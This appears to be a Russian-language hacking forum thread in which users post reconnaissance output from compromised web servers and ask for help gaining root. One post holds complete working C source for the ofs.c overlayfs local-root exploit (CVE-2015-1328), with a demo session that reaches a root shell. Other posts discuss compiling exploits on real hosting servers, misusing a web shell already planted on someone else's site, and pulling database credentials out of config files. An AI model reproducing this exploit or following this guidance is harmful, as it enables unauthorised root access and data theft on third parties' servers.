    -rw-------  1 root root  5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic
    -rw-------  1 root root  5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic
    -rw-------  1 root root  5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic
    -rw-------  1 root root  5818592 May  4 10:09 vmlinuz-3.13.0-52-generic
    -rw-------  1 root root  5821152 May 20 16:11 vmlinuz-3.13.0-53-generic
    -rw-------  1 root root  5821664 May 27 01:11 vmlinuz-3.13.0-54-generic
    -rw-------  1 root root  5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic
    ls -la --full-time /lib 2>&1
    Code:
    total 312
    drwxr-xr-x 23 root root  4096 2015-02-27 08:01:04.121244740 +0500 .
    drwxr-xr-x 24 root root  4096 2015-06-16 08:07:45.004506276 +0500 ..
    drwxr-xr-x  2 root root  4096 2014-11-21 07:40:33.676606953 +0500 apparmor
    lrwxrwxrwx  1 root root    21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  3 root root  4096 2014-06-24 11:04:14.153311413 +0500 crda
    drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware
    drwxr-xr-x  2 root root  4096 2014-06-24 11:08:09.613305094 +0500 hdparm
    drwxr-xr-x  2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu
    drwxr-xr-x  2 root root  4096 2014-06-27 11:51:14.108394221 +0500 ifupdown
    drwxr-xr-x  2 root root  4096 2014-07-30 11:27:25.309402444 +0500 init
    -rwxr-xr-x  1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so
    lrwxrwxrwx  1 root root    25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so
    lrwxrwxrwx  1 root root    17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0
    -rw-r--r--  1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0
    lrwxrwxrwx  1 root root    17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0
    -rw-r--r--  1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0
    lrwxrwxrwx  1 root root    16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0
    -rw-r--r--  1 root root  5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0
    lrwxrwxrwx  1 root root    20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0
    -rw-r--r--  1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0
    drwxr-xr-x  3 root root  4096 2014-06-24 11:03:45.029312194 +0500 lsb
    drwxr-xr-x  2 root root  4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d
    drwxr-xr-x 24 root root  4096 2015-06-16 08:07:17.752507007 +0500 modules
    drwxr-xr-x  2 root root  4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d
    drwxr-xr-x  3 root root  4096 2014-06-24 11:03:45.029312194 +0500 plymouth
    drwxr-xr-x  3 root root  4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode
    drwxr-xr-x  2 root root  4096 2014-06-27 11:51:03.188394514 +0500 resolvconf
    drwxr-xr-x  2 root root  4096 2014-07-11 15:54:31.320044515 +0500 security
    drwxr-xr-x  3 root root  4096 2014-07-10 17:19:11.242226794 +0500 systemd
    drwxr-xr-x 15 root root  4096 2014-06-24 11:03:45.029312194 +0500 terminfo
    drwxr-xr-x  4 root root  4096 2014-07-11 15:54:50.304044005 +0500 udev
    drwxr-xr-x  2 root root  4096 2014-06-24 11:12:34.149297995 +0500 ufw
    drwxr-xr-x  4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu
    drwxr-xr-x  2 root root  4096 2014-06-24 11:08:13.173304998 +0500 xtables
    ls -la --full-time /lib64 2>&1
    Code:
    total 8
    drwxr-xr-x  2 root root 4096 2015-02-27 08:01:05.833244694 +0500 .
    drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
    lrwxrwxrwx  1 root root   32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
    $ mount 2>&1
    Code:
    /dev/md0 on / type ext4 (rw,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/cgroup type tmpfs (rw)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type devtmpfs (rw,mode=0755)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
    none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
    none on /run/shm type tmpfs (rw,nosuid,nodev)
    none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
    none on /sys/fs/pstore type pstore (rw)
    /dev/md1 on /opt type ext4 (rw,usrquota)
    systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
    $ df -h 2>&1
    Code:
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/md0        459G  215G  221G  50% /
    none            4.0K     0  4.0K   0% /sys/fs/cgroup
    udev            3.8G  4.0K  3.8G   1% /dev
    tmpfs           768M  1.8M  767M   1% /run
    none            5.0M     0  5.0M   0% /run/lock
    none            3.8G   16K  3.8G   1% /run/shm
    none            100M     0  100M   0% /run/user
    /dev/md1        1.8T   48G  1.7T   3% /opt
    $ cat /etc/issue 2>&1
    Code:
    Ubuntu 14.04.1 LTS \n \l
    $ cat /etc/crontab 2>&1
    Code:
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    # ClamAV refresh virus databases
    30 1    * * *    root    freshclam >/dev/null 2>&1
    
    # ClamAV checking vhosts directory and sending email to admins
    0 2    * * *    root    /adm/clamav.sh >/dev/null 2>&1
    $ ls -la /etc/cron.d 2>&1
    Code:
    total 44
    drwxr-xr-x   2 root root  4096 Apr 21 08:16 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    -rw-------   1 root root   260 Jul 11  2014 awstats
    -rw-r--r--   1 root root  1566 Feb  3  2014 mailman
    -rw-r--r--   1 root root   589 Feb 28  2014 mdadm
    -rw-r--r--   1 root root   510 Jul  7  2014 php5
    -rw-r--r--   1 root root   110 Jul 11  2014 plesk-backup-manager-task
    -rw-r--r--   1 root root   156 Aug  7  2014 plesk-outgoing-mail-statistics-poller
    $ ls -la /etc/cron.hourly 2>&1
    Code:
    total 20
    drwxr-xr-x   2 root root  4096 Jun 24  2014 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    $ ls -la /etc/cron.monthly 2>&1
    Code:
    total 24
    drwxr-xr-x   2 root root  4096 Jul 11  2014 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    -rwxr-xr-x   1 root root   190 Jun 25  2014 50plesk-monthly
    $ ls -la /etc/cron.weekly 2>&1
    Code:
    total 40
    drwxr-xr-x   2 root root  4096 Jul 11  2014 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    -rwxr-xr-x   1 root root   189 Jun 25  2014 50plesk-weekly
    -rwxr-xr-x   1 root root   730 Feb 23  2014 apt-xapian-index
    -rwxr-xr-x   1 root root   427 Apr 16  2014 fstrim
    -rwxr-xr-x   1 root root   771 Apr 10  2014 man-db
    -rwxr-xr-x   1 root root   211 Apr 10  2014 update-notifier-common
    $ cat /proc/version 2>&1
    Code:
    Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014
    $ cat /proc/sys/vm/mmap_min_addr 2>&1
    Code:
    65536
    $ ls -la /usr/bin/staprun 2>&1
    Code:
    ls: cannot access /usr/bin/staprun: No such file or directory
    $ pwd 2>&1
    Code:
    /opt/www/vhosts/hostname.domain/logs
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    /*
    # Exploit Title: ofs.c - overlayfs local root in ubuntu
    # Date: 2015-06-15
    # Exploit Author: rebel
    # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
    # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
    # CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
     
    *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
    CVE-2015-1328 / ofs.c
    overlayfs incorrect permission handling + FS_USERNS_MOUNT
     
    user@ubuntu-server-1504:~$ uname -a
    Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
    user@ubuntu-server-1504:~$ id
    uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
    user@ubuntu-server-1504:~$ ./ofs
    spawning threads
    mount #1
    mount #2
    child threads done
    /etc/ld.so.preload created
    creating shared library
    # id
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
     
    greets to beist & kaliman
    2015-05-24
    %rebel%
    *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
    */
     
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sched.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sched.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/types.h>
    #include <signal.h>
    #include <fcntl.h>
    #include <string.h>
    #include <linux/sched.h>
     
    #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
     
    static char child_stack[1024*1024];
     
    static int
    child_exec(void *stuff)
    {
        char *file;
        system("rm -rf /tmp/ns_sploit");
        mkdir("/tmp/ns_sploit", 0777);
        mkdir("/tmp/ns_sploit/work", 0777);
        mkdir("/tmp/ns_sploit/upper",0777);
        mkdir("/tmp/ns_sploit/o",0777);
     
        fprintf(stderr,"mount #1\n");
        if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
    // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
            if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
                fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
                exit(-1);
            }
            file = ".access";
            chmod("/tmp/ns_sploit/work/work",0777);
        } else file = "ns_last_pid";
     
        chdir("/tmp/ns_sploit/o");
        rename(file,"ld.so.preload");
     
        chdir("/");
        umount("/tmp/ns_sploit/o");
        fprintf(stderr,"mount #2\n");
        if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
            if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
                exit(-1);
            }
            chmod("/tmp/ns_sploit/work/work",0777);
        }
     
        chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
        umount("/tmp/ns_sploit/o");
    }
     
    int
    main(int argc, char **argv)
    {
        int status, fd, lib;
        pid_t wrapper, init;
        int clone_flags = CLONE_NEWNS | SIGCHLD;
     
        fprintf(stderr,"spawning threads\n");
     
        if((wrapper = fork()) == 0) {
            if(unshare(CLONE_NEWUSER) != 0)
                fprintf(stderr, "failed to create new user namespace\n");
     
            if((init = fork()) == 0) {
                pid_t pid =
                    clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                if(pid < 0) {
                    fprintf(stderr, "failed to create new mount namespace\n");
                    exit(-1);
                }
     
                waitpid(pid, &status, 0);
     
            }
     
            waitpid(init, &status, 0);
            return 0;
        }
     
        usleep(300000);
     
        wait(NULL);
     
        fprintf(stderr,"child threads done\n");
     
        fd = open("/etc/ld.so.preload",O_WRONLY);
     
        if(fd == -1) {
            fprintf(stderr,"exploit failed\n");
            exit(-1);
        }
     
        fprintf(stderr,"/etc/ld.so.preload created\n");
        fprintf(stderr,"creating shared library\n");
        lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
        write(lib,LIB,strlen(LIB));
        close(lib);
        lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
        if(lib != 0) {
            fprintf(stderr,"couldn't create dynamic library\n");
            exit(-1);
        }
        write(fd,"/tmp/ofs-lib.so\n",16);
        close(fd);
        system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
        execl("/bin/su","su",NULL);
    }
    
     
    _________________________
    profishell, grimnir and d4rk73rr0r like this.
  11. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    uname -a
    Code:
    Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i
    686 i686 i386 GNU/Linux
    

    ls -la /boot
    Code:
    total 39154
    drwxr-xr-x  5 root root    5120 Apr  8 13:07 .
    drwxr-xr-x 28 root root    4096 Aug 10 03:00 ..
    -rw-r--r--  1 root root     163 Jan  6  2011 .vmlinuz-2.6.18-194.32.1.el5.hmac
    -rw-r--r--  1 root root     158 Apr  2  2010 .vmlinuz-2.6.18-194.el5.hmac
    -rw-r--r--  1 root root     166 Sep 26  2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma
    c
    -rw-r--r--  1 root root     165 Dec  5  2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac
    
    -rw-r--r--  1 root root     165 Jun 11  2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac
    
    -rw-r--r--  1 root root     161 Sep 17  2014 .vmlinuz-2.6.18-398.el5PAE.hmac
    -rw-r--r--  1 root root     161 Apr  7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac
    -rw-r--r--  1 root root  971511 Jan  6  2011 System.map-2.6.18-194.32.1.el5
    -rw-r--r--  1 root root  967675 Apr  2  2010 System.map-2.6.18-194.el5
    -rw-r--r--  1 root root  993118 Sep 26  2013 System.map-2.6.18-348.18.1.el5PAE
    -rw-r--r--  1 root root  993780 Dec  5  2013 System.map-2.6.18-371.3.1.el5PAE
    -rw-r--r--  1 root root  993835 Jun 11  2014 System.map-2.6.18-371.9.1.el5PAE
    -rw-r--r--  1 root root  993998 Sep 17  2014 System.map-2.6.18-398.el5PAE
    -rw-r--r--  1 root root  994152 Apr  7 20:53 System.map-2.6.18-404.el5PAE
    -rw-r--r--  1 root root   69598 Jan  6  2011 config-2.6.18-194.32.1.el5
    -rw-r--r--  1 root root   69593 Apr  2  2010 config-2.6.18-194.el5
    -rw-r--r--  1 root root   70337 Sep 26  2013 config-2.6.18-348.18.1.el5PAE
    -rw-r--r--  1 root root   70357 Dec  5  2013 config-2.6.18-371.3.1.el5PAE
    -rw-r--r--  1 root root   70357 Jun 11  2014 config-2.6.18-371.9.1.el5PAE
    -rw-r--r--  1 root root   70353 Sep 17  2014 config-2.6.18-398.el5PAE
    -rw-r--r--  1 root root   70353 Apr  7 20:53 config-2.6.18-404.el5PAE
    drwxr-xr-x  2 root root    1024 May  4  2010 extlinux
    drwxr-xr-x  2 root root    1024 Apr  8 13:07 grub
    -rw-------  1 root root 2599913 Jan 25  2011 initrd-2.6.18-194.32.1.el5.img
    -rw-------  1 root root 2569559 Jan 25  2011 initrd-2.6.18-194.el5.img
    -rw-------  1 root root 2615526 Oct 14  2013 initrd-2.6.18-348.18.1.el5PAE.img
    -rw-------  1 root root 2615834 Jan 24  2014 initrd-2.6.18-371.3.1.el5PAE.img
    -rw-------  1 root root 2616679 Jun 12  2014 initrd-2.6.18-371.9.1.el5PAE.img
    -rw-------  1 root root 2616919 Dec  2  2014 initrd-2.6.18-398.el5PAE.img
    -rw-------  1 root root 2616967 Apr  8 13:07 initrd-2.6.18-404.el5PAE.img
    drwx------  2 root root   12288 Jan  1  2009 lost+found
    -rw-r--r--  1 root root   80032 Mar 12  2009 message
    -rw-r--r--  1 root root  111346 Jan  6  2011 symvers-2.6.18-194.32.1.el5.gz
    -rw-r--r--  1 root root  110979 Apr  2  2010 symvers-2.6.18-194.el5.gz
    -rw-r--r--  1 root root  117369 Sep 26  2013 symvers-2.6.18-348.18.1.el5PAE.gz
    -rw-r--r--  1 root root  117471 Dec  5  2013 symvers-2.6.18-371.3.1.el5PAE.gz
    -rw-r--r--  1 root root  117487 Jun 11  2014 symvers-2.6.18-371.9.1.el5PAE.gz
    -rw-r--r--  1 root root  117549 Sep 17  2014 symvers-2.6.18-398.el5PAE.gz
    -rw-r--r--  1 root root  117561 Apr  7 20:53 symvers-2.6.18-404.el5PAE.gz
    -rw-r--r--  1 root root 1877108 Jan  6  2011 vmlinuz-2.6.18-194.32.1.el5
    -rw-r--r--  1 root root 1875796 Apr  2  2010 vmlinuz-2.6.18-194.el5
    -rw-r--r--  1 root root 1908212 Sep 26  2013 vmlinuz-2.6.18-348.18.1.el5PAE
    -rw-r--r--  1 root root 1909108 Dec  5  2013 vmlinuz-2.6.18-371.3.1.el5PAE
    -rw-r--r--  1 root root 1909140 Jun 11  2014 vmlinuz-2.6.18-371.9.1.el5PAE
    -rw-r--r--  1 root root 1910164 Sep 17  2014 vmlinuz-2.6.18-398.el5PAE
    -rw-r--r--  1 root root 1910324 Apr  7 20:53 vmlinuz-2.6.18-404.el5PAE
    
    mount
    Code:
    /dev/md3 on / type ext3 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)
    /dev/md2 on /boot type ext3 (rw)
    /dev/md1 on /var type ext3 (rw,noatime)
    /dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback)
    tmpfs on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    
    df -h
    Code:
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/md3               15G  6.8G  7.1G  49% /
    /dev/md4              4.9G  2.6G  2.1G  56% /tmp
    /dev/md2              198M   46M  143M  25% /boot
    /dev/md1              436G   21G  393G   6% /var
    /dev/md0              417G  135G  260G  35% /hsphere
    tmpfs                 5.9G     0  5.9G   0% /dev/shm
    
    cat /etc/issue
    Code:
    CentOS release 5.5 (Final
    Kernel \r on an \m
    

    cat /proc/version
    Code:
    Linux version 2.6.18-371.3.1.el5PAE ([email protected]) (gcc versio
    n 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013
    
    cat /proc/sys/vm/mmap_min_addr
    4096

    Использую этот эксполит https://www.exploit-db.com/exploits/10613/
    Но при его копиляции пишет что недостаточно прав gcc, можно это обойти ?gcc установлены права 750

    И вопрос ,я правельный экполит выбрал?? Ешё только учусь.
     
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    1. Вы используете ядерный сплойт для 2009 года, а какого года ваша сборка? 0_o
    2. Нет прав на gcc, компилируйте сплойт на локальной машине.
    3. Что-то ядерное под вашу машину вряд ли есть, посмотрите/попробуйте http://www.openwall.com/lists/oss-security/2015/07/23/16
     
    powerOfthemind likes this.
  13. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Ребят подскажите пожалуйста ,чисто случайно наткнулся на уже залитый шел на сайте

    Но он не дает ни заливать файлы ,ни читать
    http://hkar.ru/D5S3
    http://hkar.ru/D5S4

    Code:
    Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    total 34093
    drwxr-xr-x  3 root root      400 Aug 11 04:52 .
    drwxr-xr-x 24 root root      640 Aug 11 04:52 ..
    -rw-------  1 root root  3391819 Jul 29 14:35 System.map-3.13.0-61-generic
    -rw-r--r--  1 root root  1165129 Jul 29 14:35 abi-3.13.0-61-generic
    -rw-r--r--  1 root root   165763 Jul 29 14:35 config-3.13.0-61-generic
    drwxr-xr-x  2 root root      472 Aug 11 04:52 grub
    -rw-r--r--  1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic
    -rw-r--r--  1 root root   176500 Mar 12  2014 memtest86+.bin
    -rw-r--r--  1 root root   178176 Mar 12  2014 memtest86+.elf
    -rw-r--r--  1 root root   178680 Mar 12  2014 memtest86+_multiboot.bin
    -rw-------  1 root root  5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic
    При команде lls -la --full-time /lib (64) тишина
    /dev/sda1 on / type reiserfs (rw,relatime,notail)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/cgroup type tmpfs (rw)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type devtmpfs (rw,mode=0755)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
    none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
    none on /run/shm type tmpfs (rw,nosuid,nodev)
    none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
    none on /sys/fs/pstore type pstore (rw)
    /dev/sda2 on /home type reiserfs (rw,relatime)
    systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda1       9.4G  4.4G  5.0G  47% /
    none            4.0K     0  4.0K   0% /sys/fs/cgroup
    udev            3.9G   12K  3.9G   1% /dev
    tmpfs           799M  496K  798M   1% /run
    none            5.0M     0  5.0M   0% /run/lock
    none            3.9G     0  3.9G   0% /run/shm
    none            100M     0  100M   0% /run/user
    /dev/sda2       141G   51G   90G  37% /home
    Ubuntu 14.04.3 LTS \n \l
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    
    ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит
    
    Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015
    65536
    /home/ah42713/web/www
    ls -la /usr/bin/staprun ничего не выводит
    find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина 
    Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности
     
  14. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    По пробуй скачать конфиги (config.php, conn.php и так далее) базы,потом через шел зайти или myadmin найти что врятли получиться.
     
  15. avonar

    avonar Member

    Joined:
    19 May 2008
    Messages:
    20
    Likes Received:
    15
    Reputations:
    15
    Везде упоминают о каком-то старом баге, который позволял эскалировать привилегии в Active directory, о чем может идти речь?
     
  16. Valer4ik

    Valer4ik New Member

    Joined:
    25 Jul 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Есть root доступ в mysql и такой серв

    Code:
    :/var/www/user/data $ uname -a
    Linux usertoys.com.ua 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux
    :/var/www/user/data $ ls -la /boot
    total 15161
    drwxr-xr-x  4 root root     1024 May 12 13:06 .
    drwxr-xr-x 23 root root     4096 Jul 30 06:32 ..
    -rw-r--r--  1 root root  2114623 Apr 25 03:31 System.map-3.2.0-4-amd64
    -rw-r--r--  1 root root   129281 Apr 25 03:31 config-3.2.0-4-amd64
    drwxr-xr-x  3 root root     5120 May 12 13:07 grub
    -rw-r--r--  1 root root 10347571 May 12 13:06 initrd.img-3.2.0-4-amd64
    drwxr-xr-x  2 root root    12288 May 12 13:01 lost+found
    -rw-r--r--  1 root root  2842400 Apr 25 03:22 vmlinuz-3.2.0-4-amd64
    :/var/www/user/data $ ls -la --full-time /lib
    total 264
    drwxr-xr-x 13 root root  4096 2015-05-16 00:32:27.064340794 +0300 .
    drwxr-xr-x 23 root root  4096 2015-07-30 06:32:55.250270001 +0300 ..
    lrwxrwxrwx  1 root root    21 2015-05-16 00:32:27.052340698 +0300 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  2 root root  4096 2015-05-12 13:05:25.243433001 +0300 discover
    drwxr-xr-x  7 root root  4096 2015-05-12 13:03:48.463433001 +0300 firmware
    drwxr-xr-x  2 root root  4096 2015-05-12 13:03:13.543433001 +0300 init
    -rwxr-xr-x  1 root root 72184 2012-11-12 18:58:05.000000000 +0200 klibc-2xtYrByCrj5OEwaInv4tMSjej98.so
    lrwxrwxrwx  1 root root    17 2013-03-01 15:55:02.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
    -rw-r--r--  1 root root 31384 2013-03-01 15:55:04.000000000 +0200 libip4tc.so.0.1.0
    lrwxrwxrwx  1 root root    17 2013-03-01 15:55:02.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
    -rw-r--r--  1 root root 31448 2013-03-01 15:55:04.000000000 +0200 libip6tc.so.0.1.0
    lrwxrwxrwx  1 root root    15 2013-03-01 15:55:02.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
    -rw-r--r--  1 root root 10544 2013-03-01 15:55:04.000000000 +0200 libipq.so.0.0.0
    lrwxrwxrwx  1 root root    16 2013-03-01 15:55:02.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
    -rw-r--r--  1 root root  5928 2013-03-01 15:55:04.000000000 +0200 libiptc.so.0.0.0
    lrwxrwxrwx  1 root root    19 2013-03-01 15:55:02.000000000 +0200 libxtables.so.7 -> libxtables.so.7.0.0
    -rw-r--r--  1 root root 47824 2013-03-01 15:55:04.000000000 +0200 libxtables.so.7.0.0
    drwxr-xr-x  3 root root  4096 2015-05-12 13:03:13.911433001 +0300 lsb
    drwxr-xr-x  2 root root  4096 2015-05-12 13:03:25.155433001 +0300 modprobe.d
    drwxr-xr-x  3 root root  4096 2015-05-12 13:03:59.007433001 +0300 modules
    drwxr-xr-x  3 root root  4096 2015-05-12 13:03:27.079433001 +0300 systemd
    drwxr-xr-x 15 root root  4096 2015-05-12 13:03:06.719433001 +0300 terminfo
    drwxr-xr-x  5 root root  4096 2015-05-12 13:03:27.463433001 +0300 udev
